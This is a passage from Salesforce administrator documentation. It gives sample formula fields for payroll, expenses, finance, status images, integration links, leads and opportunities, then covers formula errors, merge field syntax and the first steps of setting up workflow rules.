This example formula determines which amount to provide in employee 401K matching based on a matching program of half
of the employee's contribution or $250, whichever is less. It assumes you have custom currency field for Contribution.

MIN(250, Contribution__c /2)

Hours Worked Per Week

This formula uses a custom tab to enable time tracking of hours worked per day. It uses a formula field to sum the hours per
week.

MonHours__c + TuesHours__c + WedsHours__c + ThursHours__c + FriHours__c

Total Pay Amount

This formula determines total pay by calculating regular hours multiplied by a regular pay rate, plus overtime hours multiplied
by an overtime pay rate.

Total Pay =
IF(Total_Hours__c <= 40, Total_Hours__c * Hourly_Rate__c,
40 * Hourly_Rate__c +
(Total_Hours__c - 40) * Overtime_Rate__c)

Expense Tracking

Expense Identifier

This formula displays the text “Expense-” followed by trip name and the expense number. This is a text formula field that
uses an expense number custom field.

"Expense-"
& Trip_Name__c & "-" & ExpenseNum__c

Mileage Calculation

This formula calculates mileage expenses for visiting a customer site at 35 cents a mile.

Miles_Driven__c * 0.35

Financial Calculations

Compound Interest

This formula calculates the interest, you will have after T years, compounded M times per year.

Principal__c * ( 1 + Rate__c / M ) ^ ( T * M) )
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Compound Interest Continuous

This formula calculates the interest that will have accumulated after T years, if continuously compounded.

Principal__c * EXP(Rate__c * T)

Consultant Cost

This formula calculates the number of consulting days times 1200 given that this formula field is a currency data type and
consulting charges a rate of $1200 per day. Note that Consulting Days is a custom field.

Consulting_Days__c
* 1200

Gross Margin

This formula provides a simple calculation of gross margin. In this formula example, Total Sales and Cost of Goods
Sold are custom currency fields.

Total_Sales__c - Cost_of_Goods_Sold__c

Gross Margin Percent

This formula calculates the gross margin based on a margin percent.

Margin_percent__c * Items_Sold__c * Price_item__c

Payment Due Indicator

This formula returns the date five days after the contract start date whenever Payment Due Date is blank. Payment Due
Date is a custom date field.

(BLANKVALUE(Payment_Due_Date__c, StartDate
+5)

Payment Status

This formula determines if the payment due date is past and the payment status is “UNPAID.” If so, it returns the text
“PAYMENT OVERDUE” and if not, it leaves the field blank. This example uses a custom date field called Payment Due
Date and a text custom field called Payment Status on contracts.

IF(
AND(Payment_Due_Date__c < TODAY(),
ISPICKVAL(Payment_Status__c, "UNPAID")),
"PAYMENT OVERDUE",
null )
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Image Links

Yahoo! Instant Messenger™ Image

This formula displays an image that indicates whether a contact or user is currently logged in to Yahoo! Instant Messenger.
Clicking the image launches the Yahoo! Instant Messenger window. This formula uses a custom text field called Yahoo Name
to store the contact or user’s Yahoo! ID.

IF(ISBLANK(Yahoo_Name__c),"", HYPERLINK("ymsgr:sendIM?" & Yahoo_Name__c,
IMAGE("http://opi.yahoo.com/online?u=" & Yahoo_Name__c & "&m=g&t=0", " ")))

“Skype Me™” Auto Dialer Button

This formula displays an image that looks like a push button. Clicking the button automatically dials the specified phone
number.

HYPERLINK("callto://" & "+1" & Phone,
IMAGE("http://goodies.skype.com/graphics/skypeme_btn_small_blue.gif",
"Click to Skype"))

Flags for Case Priority

This formula displays a green, yellow, or red flag image to indicate case priority.

IMAGE(
CASE( Priority,
"Low", "/img/samples/flag_green.gif",
"Medium", "/img/samples/flag_yellow.gif",
"High", "/img/samples/flag_red.gif",
"/s.gif"),
"Priority Flag")

Color Squares for Case Age

This formula displays a 30 x 30 pixel image of a red, yellow, or green, depending on the value of a Case Age custom text
field.

IF( Case_Age__c > 20,
IMAGE("/img/samples/color_red.gif", "red", 30, 30),
IF( Case_Age__c > 10,
IMAGE("/img/samples/color_yellow.gif", "yellow", 30, 30),
IMAGE("/img/samples/color_green.gif", "green", 30, 30),
))

Traffic Lights for Status

This formula displays a green, yellow, or red traffic light images to indicate status, using a custom picklist field called Project
Status. Use this formula in list views and reports to create a “Status Summary” dashboard view.

IMAGE(
CASE(Project_Status__c,
"Green", "/img/samples/light_green.gif",
"Yellow", "/img/samples/light_yellow.gif",
"Red", "/img/samples/light_red.gif",
"/s.gif"),
"status color")
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Stars for Ratings

This formula displays a set of one to five stars to indicate a rating or score.

IMAGE(
CASE(Rating__c,
"1", "/img/samples/stars_100.gif",
"2", "/img/samples/stars_200.gif",
"3", "/img/samples/stars_300.gif",
"4", "/img/samples/stars_400.gif",
"5", "/img/samples/stars_500.gif",
"/img/samples/stars_000.gif"),
"rating")

Consumer Reports™—Style Colored Circles for Ratings

This formula displays a colored circle to indicate a rating on a scale of one to five, where solid red is one, half red is two, black
outline is three, half black is four, and solid black is five.

IMAGE(
CASE(Rating__c,
"1", "/img/samples/rating1.gif",
"2", "/img/samples/rating2.gif",
"3", "/img/samples/rating3.gif",
"4", "/img/samples/rating4.gif",
"5", "/img/samples/rating5.gif",
"/s.gif"),
"rating")

Horizontal Bars to Indicate Scoring

This formula displays a horizontal color bar (green on a white background) of a length that is proportional to a numeric score.
In this example, the maximum length of the bar is 200 pixels.

IMAGE("/img/samples/color_green.gif", "green", 15, Industry_Score__c * 2) &
IMAGE("/s.gif", "white", 15,
200 - (Industry_Score__c * 2))

Integration Links

Application API Link

This formula creates a link to an application outside Salesforce, passing the parameters so that it can connect to Salesforce via
the SOAP API and create the necessary event.

HYPERLINK ("https://www.myintegration.com?sId=" & GETSESSIONID() & "?&rowID=" & Name &
"action=CreateTask","Create a Meeting Request")
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Shipment Tracking Integration

This formula creates a link to FedEx, UPS, or DHL shipment tracking websites, depending on the value of a Shipping
Method custom picklist field. Note that the parameters shown in this example for FedEx, UPS, and DHL websites are
illustrative and do not represent the correct parameters for all situations.

CASE(Shipping_Method__c,
"Fedex",
HYPERLINK("http://www.fedex.com/Tracking?ascend_header=1&clienttype
=dotcom&cntry_code=us&language=english&tracknumbers= "& tracking_id__c,"Track"),
"UPS",
HYPERLINK("http://wwwapps.ups.com/WebTracking/processInputRequest?HTMLVersion
=5.0&sort_by=status&loc=en_US&InquiryNumber1= "& tracking_id__c & "&track.x=32&track.y=7",
"Track") ,
"DHL",
HYPERLINK("http://track.dhl-usa.com/TrackByNbr.asp?ShipmentNumber=" & tracking_id__c,"Track"),
"")

Skype™ Auto Dialer Integration

This formula creates a linkable phone number field that automatically dials the phone number via the Skype VOIP phone
application. It requires installation of the Skype application (a third-party product not provided by salesforce.com) on your
desktop.

HYPERLINK("callto://+" & Country_Code__c & Phone_Unformatted__c, Phone)

Lead Management

Lead Aging (for open leads)

This formula checks to see if a lead is open and if so, calculates the number of days it has been open by subtracting the date
and time created from the current date and time. The result is the number of days open rounded to zero decimal places. If the
lead is not open, this field is blank.

IF(ISPICKVAL(Status,
"Open"), ROUND(NOW()-CreatedDate, 0), null)

Lead Data Completeness

This formula calculates the percent of certain lead fields that your sales personnel enter. The formula field checks the values
of two custom number fields: Phone and Email. If the fields are empty, the formula returns the value “0.” The formula returns
a value of “1” for each field that contains a value and multiplies this total by fifty to give you the percentage of fields that
contain data.

(IF(Phone = "", 0, 1) + IF(Email = "", 0, 1) ) * 50

Lead Numbering

This formula returns a number value for the text value in the auto-number field Lead Number. This can be useful if you want
to use the Lead Number field in a calculation, such as round-robin or other routing purposes. Note that auto-number fields
are text fields and must be converted to a number for numeric calculations.

VALUE(Lead_Number__c)
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Round-Robin Assignment of Cases or Leads

The following formula example for leads assumes you have three lead queues and you want to assign an equal number of
incoming leads to each queue. You can also assign cases using a similar formula.

MOD(VALUE(Lead_Number__c),
3)

This formula is for a custom formula field named Round_Robin_ID that assigns each lead a value of 0, 1, or 2. This formula
uses a custom auto-number field called Lead Number that assigns each lead a unique number starting with 1. The MOD
function divides the lead number by the number of lead queues available (three in this example) and returns a remainder of 0,
1, or 2. Use the value of this formula field in your lead assignment rules to assign lead records to different queues. For example:

• Round_Robin_ID = 0 is assigned to Queue A
• Round_Robin_ID = 1 is assigned to Queue B
• Round_Robin_ID = 2 is assigned to Queue C

Metrics

Temperature Conversion

This formula converts Celsius degrees to Fahrenheit.

1.8 * degrees_celsius__c + 32

Unit of Measure Conversion

This formula converts kilometers to miles.

Miles__c/.621371192

Opportunity Management

Days Left to Close

This formula returns the expected number of days left to the close date of an opportunity.

Expected_close_date__c -TODAY()

Display Close Month for Reporting Purposes

This formula returns the month in text for the close date of an opportunity. Use this example when building a custom report
that groups opportunities by the month of the Close Date.

CASE(
MONTH(CloseDate),
1, "January",
2, "February",
3, "March",
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4, "April",
5, "May",
6, "June",
7, "July",
8, "August",
9, "September",
10, "October",
11, "November",
12, "December",
"Invalid month")

Expected Product Revenue

This formula calculates total revenue from multiple products, each with a different probability of closing.

ProductA_probability__c * ProductA_revenue__c + ProductB_probability__c * ProductB_revenue__c

Maintenance Calculation

This formula calculates maintenance fees as 20% of license fees per year. Maintenance Years is a custom field on
opportunities.

Amount * Maint_Years__c * 0.2

Monthly Subscription-Based Calculated Amounts

This formula calculates an opportunity amount based on a monthly subscription rate multiplied by the subscription period.

Monthly_Amount__c * Subscription_Months__c

Monthly Value

This formula divides total yearly value by 12 months.

Total_value__c / 12

Opportunity Additional Costs

This formula calculates the sum of the product Amount, maintenance amount, and services fees. Note that Maint amount
and Service Fees are custom currency fields.

Amount
+ Maint_Amount__c + Services_Amount__c

Opportunity Categorization

This formula uses conditional logic to populate an Opportunity category text field, based on the value of the Amount
standard field. Opportunities with amounts less than $1500 are “Category 1,” those between $1500 and $10000 are “Category
2,” and the rest are “Category 3.” This example uses nested IF statements.

IF(Amount < 1500, "Category 1", IF(Amount > 10000, "Category 3", "Category 2"))

Opportunity Data Completeness

This formula takes a group of fields and calculates what percent of them are being used by your personnel. This formula field
checks five fields to see if they are blank. If so, a zero is counted for that field. A “1” is counted for any field that contains a
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value and this total is divided by five (the number of fields evaluated). Note that this formula requires you select the Treat
blank fields as blanks option under Blank Field Handling while the Advanced Formula subtab is showing.

(IF(ISBLANK(Maint_Amount__c), 0, 1) +
IF(ISBLANK(Services_Amount__c), 0,1) +
IF(ISBLANK(Discount_Percent__c), 0, 1) +
IF(ISBLANK(Amount), 0, 1) +
IF(ISBLANK(Timeline__c), 0, 1)) / 5

Opportunity Expected License Revenue

This formula calculates expected revenue for licenses based on probability of closing.

Expected_rev_licenses__c * Probability

Opportunity Reminder Date

This formula creates reminder date based on seven days before the close date of an opportunity. Use this formula field in a
workflow rule to create an event for the appropriate user to take action.

Reminder Date = CloseDate - 7

Opportunity Revenue Text Display

This formula returns the expected revenue amount of an opportunity in text format without a dollar sign. For example, if the
Expected Revenue of a campaign is “$200,000,” this formula field displays “200000.”

TEXT(ExpectedRevenue)

Opportunity Total Deal Size

This formula calculates the sum of maintenance and services amounts.

Amount + Maint_Amount__c + Services_Amount__c

Opportunity Total Price Based on Units

This formula generates proposal pricing based on unit price and total volume.

Unit_price__c * Volume__c * 20

Professional Services Calculation

This formula estimates professional service fees at an average loaded rate of $1200 per day. Consulting Days is a custom
field on opportunities.

Consulting_Days__c * 1200

Stage-Based Sales Document Selection

This formula Identifies a relevant document in the Documents tab based on opportunity Stage. Use document IDs in the
form of “00l30000000j7AO.”

CASE(StageName,
"Prospecting", "Insert 1st Document ID",
"Qualification", "Insert 2nd Document ID",
"Needs Analysis", "Insert 3rd Document ID",
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"Value Proposition", ...
)
)

Sales Coach

This formula creates a hyperlink that opens a stage-specific document stored in the Documents tab. It uses the previously
defined custom formula field that identifies a document based on opportunity Stage. See Stage-Based Sales Document
Selection on page 3105.

HYPERLINK("/servlet/servlet.FileDownload?file=" & Relevant_Document__c, "View Document in
New Window")

Shipping Cost by Weight

This formula calculates postal charges based on weight.

package_weight__c * cost_lb__c

Shipping Cost Percentage

This formula calculates shipping cost as a fraction of total amount.

Ship_cost__c / total_amount__c

Tiered Commission Rates

This formula calculates the 2% commission amount of an opportunity that has a probability of 100%. All other opportunities
will have a commission value of zero.

IF(Probability = 1,
ROUND(Amount * 0.02, 2),
0)

Total Contract Value from Recurring and Non-Recurring Revenue

This formula calculates both recurring and non-recurring revenue streams over the lifetime of a contract.

Non_Recurring_Revenue__c + Contract_Length_Months__c * Recurring_Revenue__c

Pricing

Total Amount

This formula calculates a total amount based on unit pricing and total units.

Unit_price__c * Total_units__c

User Pricing

This formula calculates a price per user license.

Total_license_rev__c / Number_user_licenses__c
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Project Management

Calculate Intermediate Milestone from End Date

This formula calculates intermediate milestone dates by subtracting days from the end date (for projects that are planned based
on end date).

Release_Date__c - 7 * Phase_duration_in_weeks__c

Scoring Calculations

Lead Scoring

This formula scores leads, providing a higher score for phone calls than website requests.

CASE(LeadSource, "Phone", 2, "Web", 1, 0)

Here's a formula that scores a lead based on his or her rating:

CASE(1, IF(ISPICKVAL(Rating, "Hot"), 1, 0), 3, IF(ISPICKVAL(Rating, "Warm"), 1, 0), 2,
IF(ISPICKVAL(Rating, "Cold"), 1, 0), 1))

Customer Success Scoring

This formula uses a simple scoring algorithm to rank customers a high score for positive survey results in Salesforce.

Survey_Question_1__c * 5 + Survey_Question_2__c *2

Formula Errors
Available in: All Editions

User Permissions Needed

“View Setup and Configuration”To view formula field details:

“Customize Application”To create, change, or delete formula fields:

• “#Error!” displays for a formula field whenever an error occurs while calculating the value of a formula. To resolve the
error, check your formula.
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Is the formula dividing by zero? If so, check if the denominator of your expression is zero and provide an alternative
value. For example, the following campaign formula field is blank if the number of opportunities is zero:

IF(NumberOfOpportunities > 0,
NumberOfWonOpportunities / NumberOfOpportunities, null)

◊

◊ Is the formula calculating a value larger than the maximum value of the current type? If so, you can append L to numeric
values to make them Long so the intermediate products will be Long and no overflow occurs. For example, the following
example shows how to correctly compute the amount of milliseconds in a year by multiplying Long numeric values.

Long MillsPerYear = 365L * 24L * 60L * 60L * 1000L;
Long ExpectedValue = 31536000000L;
System.assertEquals(MillsPerYear, ExpectedValue);

◊ Is the formula calculating the square root of a negative number? If so, use an IF function similar to the one above to
check if the value is a positive number.

◊ Is the formula calculating the LOG of a negative number? If so, use an IF function similar to the one above to make
sure that the number is positive.

◊ Is the formula using the VALUE function with text that contains special characters? For examples of special characters,
see Formula Operators and Functions on page 3037.

◊ Make sure the formula does not contain a HYPERLINK function within a text function, such as LEFT(
HYPERLINK("http://MYCOMPANY.ORG ", "MYCOMPANY ") , 5).

◊ Is the formula disabled or referencing a disabled formula field? Salesforce disables formula fields when they are deleted
and they remain disabled after they are restored. To enable disabled formula fields, edit and save the field. For more
information on deleted custom fields and restoring them, see Managing Deleted Custom Fields on page 2936.

• “#Too Big!” displays if your formula output is over 18 digits. When this happens, check your formula for calculations that
could result in more than 18 digits. Avoid multiplying large numbers, raising a large number to a power, or dividing by a
very small number.

• CASE functions return an error whenever any of the expressions return an error, regardless of which one should be returned.
For example, CASE(Field__c,"Partner", "P", "Customer", "C", LEFT(Field__c, -5)) returns an error
even if the value of the field is “Partner” or “Customer” because the last statement is illogical.

• Prevent division by zero errors by including an IF function that determines if the value of a field is zero. For example,
IF(Field__c =0,0, 25/Field__c).

MERGE FIELDS

Merge Fields Overview
The available merge fields vary according to which Salesforce edition you have.

A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate values
from a record. For example, you can place a merge field in an email template so that the greeting includes the recipient’s name
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rather than a generic “Hello!”. You can use merge fields within custom formula fields, s-controls, custom links, custom buttons,
Visualforce pages, and when you create email or mail merge templates.

Merge field names are determined when you create a new custom field or object. Field Name is automatically populated
based on what you type into Field Label. You can customize this field if you want, but keep in mind that the name must:

• Only use underscores and alphanumeric characters

• Begin with a letter and end with a letter

• Not include spaces

• Not contain two consecutive underscores

Important:

Ensure that the custom field name and label are unique for that object.

• If a standard and custom field have identical names or labels, the merge field displays the custom field value.

• If two custom fields have identical names or labels, the merge field may display an unexpected value.

If you create a field label called Email and a standard field labeled Email already exists, the merge field may be
unable to distinguish between the fields. Adding a character to the custom field name makes it unique. For example,
Email2.

To find the merge field name for an object or field in Salesforce, visit the object or field’s detail page and refer to Field
Name.

To incorporate merge fields, use the editor in the respective feature. Salesforce provides valid merge fields in each editor for
all related standard and custom objects. If you’re using the Connect for Office Word add-in to create mail merge templates,
you’ll see a complete list of valid merge fields to insert.

Syntax

The syntax for a merge field may differ, depending on where you’re using it in Salesforce. To ensure that you’re using the
correct syntax, select merge fields from the drop-down list in the editor where you’re using the merge field.

Custom objects and fields are always appended with __c when referenced. Field labels are preceded by the object, and all
spaces are converted to underscores. For example, Account.CreatedDate references the Created Date standard field
for the account object.

In standard relationships, the name of the relationship is the master object. For example, you can reference the account name
from a contact validation rule using Account.Name; you can reference the phone number of the account creator from an
opportunity product formula field using Opportunity.Account.CreatedBy.Phone. In custom relationships, the name
of the relationship is the value specified in Field Name with __r appended to it. For example, you can reference contact
email from a custom object validation rule using Contact__r.Email.

General Tips

• To use a merge field as the destination of a link, insert the merge field after http://.
• Salesforce rounds numbers referenced in merge fields according to the user’s locale, not the number of decimal spaces

specified in the number field configuration.
• You can store the name of an account, contact, or lead in your organization’s default language (the local name), in addition

to the account or user’s default language (the standard name). If the local name is blank, the standard merge field name is
used.

• To reference a stand-alone file, use $Resource.<resource_name>, where <resource_name> is the name you specified
when you uploaded the resource.
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• If you're using the Translation Workbench to translate custom field names, users can look up merge fields in their chosen
language.

Merge Fields for Validation Rules
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate values
from a record.

Syntax and Formatting

When you insert a merge field in a validation rule, the syntax consists of the object, a period, and the field name. For example,
$User.State corresponds with a user’s state or province.

The syntax for a merge field may differ, depending on where you’re using it in Salesforce. To ensure that you’re using the
correct syntax, select merge fields from the drop-down list in the editor where you’re using the merge field. The merge fields
for validation rules correspond directly with the fields in your app.

• For a list of fields with your standard objects, from Setup, click Customize, click the standard object in question, and click
Fields.

• For a list of fields with your custom objects, from Setup, click Create > Objects, click the custom object in question, and
look in the Standard Fields and Custom Fields & Relationships areas.

Important:

• If a standard object and custom object have matching names or labels, only the standard object's fields display
when you select from Available Merge Fields.

For example, if you have a custom object and a standard object both called Quote, you won’t be able to select the
custom object. To ensure that you can select merge fields from either object, add a character to make the custom
object’s name and label unique, such as Quote2.

• If two or more custom objects have matching names or labels, only one of the objects displays when you select
from Available Merge Fields. Ensure that all custom objects have unique names and labels so that you can select
merge fields from any of the objects.

Limitations

Validation rules can’t reference merge fields for:

• Auto number fields, such as Requisition Number

• Compound fields, such as addresses, first and last names, dependent picklists, and dependent lookups

Note:  Validation rules can reference merge fields individual address fields, such as Billing City.

• Campaign statistic fields, including statistics for individual campaigns and campaign hierarchies

Tips

• Some merge fields display as radio buttons but function like picklist fields when referenced in a formula.
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Use the values “Read,” “Edit,” and “None” in a formula when referencing:

◊ $UserRole.CaseAccessForAccountOwner
◊ $UserRole.OpportunityAccessForAccountOwner
◊ CaseAccessLevel (on Territory)
◊ OpportunityAccessLevel (on Territory)

Use the values “Read,” “Edit,” and “All” in a formula when referencing:

◊ AccountAccessLevel (on Territory)

• Use the RecordType.Id merge field in your formula to apply different validations for different record types.

Merge Fields for Formulas
Available in: All Editions

A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate values
from a record.

Syntax and Formatting

Merge fields for formulas aren’t enclosed in curly braces or preceded by an exclamation point, nor are they preceded by the
type of record. For example: AccountNumber. To ensure you’re using the correct syntax, use the Insert Field button or the
drop-down list in the formula editor.

Tips

• Delegated administrators need to have access to custom objects to access the objects’ merge fields from formulas.
• Some merge fields display as radio buttons but function like picklist fields when referenced in a formula.

Use the values “Read,” “Edit,” and “None” in a formula when referencing:

◊ $UserRole.CaseAccessForAccountOwner
◊ $UserRole.OpportunityAccessForAccountOwner
◊ CaseAccessLevel (on Territory)
◊ OpportunityAccessLevel (on Territory)

Use the values “Read,” “Edit,” and “All” in a formula when referencing:

◊ AccountAccessLevel (on Territory)

• If you create a contacts formula field that references account merge fields, that field can be included in contact page layouts
but should not be included in person accounts page layouts. The formula field will display a value of #Error on the person
accounts page.

• In account formulas, all business account fields are available as merge fields. However, account fields exclusive to person
accounts such as Birthdate and Email are not available.

• To determine if a record is a task or event, use the IsTask merge field. For example:

IF(IsTask, "This is a task", "This is an event")
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• To reference the unique identifier for your Salesforce organization in a formula, insert the $Organization.Id  merge
field. This merge field can display anywhere formula fields can except in reports.

• Formula fields that include related object merge fields are not allowed in roll-up summary fields.
• Using RecordType.Id can make your formula less readable; when you do use it, write in-line comments into the formula

to clarify.

Merge Fields for Cross-Object Formulas
Available in: All Editions

A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate values
from a record.

Cross-object formulas are formulas that span two related objects and reference merge fields on those objects. Cross-object
formulas can reference merge fields from a master (“parent”) object if an object is on the detail side of a master-detail relationship.
You can reference fields from objects that are up to 10 relationships away. Cross-object formulas are available anywhere
formulas are used except when creating default values. For example, you can write a cross-object formula that references the
Account Name for a contact associated with a case. In this example, you would type Contact.Account.Name in a formula
on the Case object.

Syntax and Formatting

Merge fields for formulas aren’t enclosed in curly braces or preceded by an exclamation point. Use the relationship names of
the objects, not the labels. Although the relationship name is often the same as the object name, it is technically the field name
of the relationship field.

To reference the parent account name from Account object, the syntax is Parent.Name, not Account.Name. When
referencing a custom object, add two underscores and the letter r to its name. For example, Position__r.title__c
references the Job Title field (title__c) on a Position custom object.

Limitations

You can’t reference:

• Merge fields for objects related to activities. For example, merge fields for contacts and accounts are not available in task
and event formulas.

• Record owner merge fields for any object. For example, the opportunity owner’s Role merge field is not available in
opportunity formulas.

• The $RecordType global variable—it only resolves to the record containing the formula, not the record to which the
formula spans. Starting with the Spring ’13 release, when you create a new formula the $RecordType global variable is
only available for default value formulas.

The value of the Profile.Name merge field differs depending on the context of the cross-object formula field that references
it. On detail pages, the value is the profile name, as expected; however, in list views and reports, the value is the internal value
of the associated profile instead.  If you use Profile.Name in a formula, use it within an OR function to ensure the formula
always returns the intended result. For example:

IF
(OR

(LastModifiedBy.Profile.Name = "Standard User", LastModifiedBy.Profile.Name =
"PT2"),

"Standard", "Not Standard")
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None of the above applies to profile names referenced by the $Profile global variable.

ENHANCING YOUR BUSINESS PROCESSES

IMPLEMENTING WORKFLOW

Workflow and Approvals Overview
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Approvals, Tasks, and Email Alerts are not available in Database.com

User Permissions Needed

“View Setup and Configuration”To view workflow rules and approval processes:

“Customize Application”To create or change workflow rules and approval processes:

Your sales force operates more efficiently with standardized internal procedures and automated business processes. Many of
the tasks you normally assign, the emails you regularly send, and other record updates are part of an organization's standard
processes. Instead of doing this work manually, you can configure workflow and approvals to do it automatically.

Begin by designing workflow rules and approval processes, and associating them with actions such as email alerts, tasks, field
updates, or outbound messages.

About Workflow

Each workflow rule consists of:

• Criteria that determine when Salesforce executes the workflow rule. Any change that causes a record to match this criteria
can trigger the workflow rule—even changes to hidden fields.

• Immediate actions to take when the workflow rule executes. For example, Salesforce can automatically send an email that
notifies the opportunity team when a new high-value opportunity is created.

• Time-dependent actions that Salesforce queues when the workflow rule executes. For example, Salesforce can automatically
send an email reminder to the account team if a high-value opportunity is still open ten days before the specified close
date. When Salesforce triggers a workflow rule that has time-dependent actions, you can use the workflow queue to monitor
and cancel pending actions.

Workflow automates the following types of actions:

• Email Alerts—Send an email to one or more recipients. For example, automatically send sales management an email alert
when a sales representative qualifies a large deal.

• Tasks—Assign a new task to a user, role, or record owner. For example, automatically assign follow-up tasks to a support
representative one week after a case is updated.
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• Field Updates—Update the value of a field on a record. For example, automatically change the Owner field on a contract
three days before it expires.

• Outbound Messages—Send a secure configurable API message (in XML format) to a designated listener. For example,
automatically initiate the reimbursement process for an approved expense report by triggering an outbound API message
to an external HR system.

About Approvals

An approval process is an automated process your organization can use to approve records in Salesforce. An approval process
specifies the steps necessary for a record to be approved and who must approve it at each step. A step can apply to all records
included in the process, or just records that meet certain administrator-defined criteria. An approval process also specifies the
actions to take when a record is approved, rejected, recalled, or first submitted for approval. For more details about approval
processes and what they entail, see Getting Started with Approval Processes on page 3160.

See Also:
Creating Workflow Rules
Examples of Workflow Rules
What's the Difference Between Workflow and Visual Workflow?
Administrator tip sheet: Workflow: Automating The Process

Managing Workflow Rules
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Tasks and Email Alerts are not available in Database.com

User Permissions Needed

“View Setup and Configuration”To view workflow rules:

“Customize Application”To create or change workflow rules:

Automate your organization’s standard processes by configuring workflow rules.

If you plan on configuring workflow rules that have time-dependent actions, specify a default workflow user. Salesforce
associates the default workflow user with a workflow rule if the user who initiated the rule is no longer active.

To get started using workflow rules, from Setup, click Create > Workflow & Approvals > Workflow Rules. From this page,
you can:

• Create a new workflow rule.

• Select an existing rule to view its details, clone it, activate and deactivate it, or view and edit actions and time triggers.

• Edit a workflow rule.

• Delete a workflow rule.

Note:  You can't delete a workflow rule that has pending actions in the workflow queue. Wait until pending
actions are processed, or use the workflow queue to cancel the pending actions.
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• Activate a workflow rule. Click Deactivate to prevent the rule from firing when its conditions are met.

Note:

◊ You can deactivate a workflow rule at any time. However, if you deactivate a rule that has pending actions,
Salesforce completes those actions as long as the record that triggered the rule is not updated.

◊ You can't add time-dependent workflow actions to active workflow rules. Deactivate the workflow rule first,
add the time-dependent workflow action, and reactivate the rule.

◊ When tasks are created automatically by actions such as clicking the Send An Email button, they don't trigger
task-based workflow rules.

Tip:  You can use the Developer Console to debug workflow rules. The Developer Console lets you view debug log
details and information about workflow rules and actions, such as the name of the user who triggered the workflow
rule and the name and ID of the record being evaluated.

See Also:
Creating Workflow Rules
Notes on Using Workflow Rules

Creating Workflow Rules
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Tasks, Sites, and Email Alerts are not available in Database.com

User Permissions Needed

“Customize Application”To create or change workflow rules and actions:

Watch a Demo: Creating a Workflow Rule (2:50 minutes)

Automate your organization’s standard processes by configuring workflow rules.

To create a new rule:

1. Select the object to which the workflow rule applies.
2. Configure the workflow rule settings and criteria.
3. Configure the workflow actions.
4. Activate the workflow rule.

See Also:
Notes on Using Workflow Rules
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Selecting the Object for Your Workflow Rule

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Tasks, Sites, and Email Alerts are not available in Database.com

User Permissions Needed

“Customize Application”To create or change workflow rules and actions:

1. From Setup, click Create > Workflow & Approvals > Workflow Rules.
2. On the workflow rules list page, click New Rule.
3. Choose an object to which you want this workflow rule to apply.

Note:

• If you have a workflow action that updates a field on a related object, that target object isn't the one associated
with the workflow rule.

• To create workflow rules based on new case comments or incoming email messages that automatically update
fields on their associated cases, choose either Case Comment or Email Message. See Notes on Using Workflow
Rules for more information.

• To create a site usage rule, choose one of the following:

◊ Organization (for monthly page views allowed and monthly page views used fields)
◊ Site (for site detail, daily bandwidth and request time, monthly page views allowed, and other fields)
◊ User License (for the monthly logins allowed and monthly logins used fields)

The Organization and Site objects are only available if Force.com sites is enabled for your organization. The
User License object isn't dependent on sites, and is only available if you have Customer Portals or partner
portals enabled for your organization.

• You can't create email alerts for workflow rules on activities.

4. Click Next.

See Also:
Creating Workflow Rules
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Configuring Rule Settings and Criteria

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Tasks, Sites, and Email Alerts are not available in Database.com

User Permissions Needed

“Customize Application”To create or change workflow rules and actions:

After selecting the object for your workflow rule, you can configure its settings and criteria.

1. Enter a rule name.
2. Enter a description for the rule.
3. Set the evaluation criteria:

DescriptionEvaluate the rule when a
record is:

Evaluate the rule criteria each time a record is created. If the rule criteria is met,
run the rule. Ignore all updates to existing records.

With this option, the rule never runs more than once per record.

created

Evaluate the rule criteria each time a record is created or updated. If the rule criteria
is met, run the rule.

With this option, the rule repeatedly runs every time a record is edited, as long as
the record meets the rule criteria.

created, and every time it’s
edited

Note:  You can't add time-dependent actions to the rule if you select this
option.

(Default) Evaluate the rule criteria each time a record is created or updated.created, and any time it’s
edited to subsequently meet
criteria

• For a new record, run the rule if the rule criteria is met.
• For an updated record, run the rule only if the record is changed from not

meeting the rule criteria to meeting the rule criteria.

With this option, the rule can run multiple times per record, but it won’t run when
the record edits are unrelated to the rule criteria.

For example, suppose that for an opportunity record to meet the rule criteria, the
opportunity probability must be greater than 50%. If you create an opportunity
with a probability of 75%, the workflow rule runs. If you edit that opportunity by
changing the probability to 25%, the edit doesn’t cause the rule to run. If you then
edit that opportunity by changing the probability from 25% to 75%, the edit causes
the rule to run. With this last edit, the rule runs because the record is changed
from not meeting the rule criteria to meeting the rule criteria.
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4. Enter your rule criteria:

• Choose criteria are met and select the filter criteria that a record must meet to trigger the rule. For example, set
the filter to “Opportunity: Amount greater than 5000” if you want opportunity records with an amount greater than
$5,000 to trigger the rule.

If your organization uses multiple languages, enter filter values in your organization’s default language. You can add
up to 25 filter criteria, of up to 255 characters each.

Note: Workflow rules and entry criteria for approval processes and steps respect the user's locale and aren't
triggered when the user is in a different language than that of the organization.

• Choose formula evaluates to true and enter a formula that returns a value of “True” or “False.” Salesforce
triggers the rule if the formula returns “True.”

Examples of useful workflow formulas include:

◊ If the number of filled positions equals the number of total positions on a job, update the Job Status field to
“Filled.”

◊ If mileage expenses associated with visiting a customer site are 35 cents per mile and exceed a $1,000 limit,
automatically update the Approval Required field to “Required.”

◊ If a monthly subscription-based opportunity amount is greater than $10,000, create a task for an opportunity owner
to follow up 60 days after the opportunity is closed.

The $Label variable isn’t supported in workflow rule formulas. Also, some functions aren't available in workflow rule
formulas.

Tip:  You can use merge fields for directly related objects in workflow rule formulas.

5. Click Save & Next.

See Also:
Creating Workflow Rules
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Configuring Workflow Actions

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Tasks, Sites, and Email Alerts are not available in Database.com

User Permissions Needed

“Customize Application”To create or change workflow rules and actions:

Add immediate and time-dependent actions to the workflow rule. Immediate actions trigger once evaluation criteria are met.
Time-dependent actions specify when Salesforce executes the workflow action. For example, Salesforce can automatically send
an email reminder to the account team if a high-value opportunity is still open ten days before the specified close date.

Tip:  Time-dependent actions and time triggers are complex features with several considerations.

If you plan on configuring workflow rules that have time-dependent actions, specify a default workflow user. Salesforce
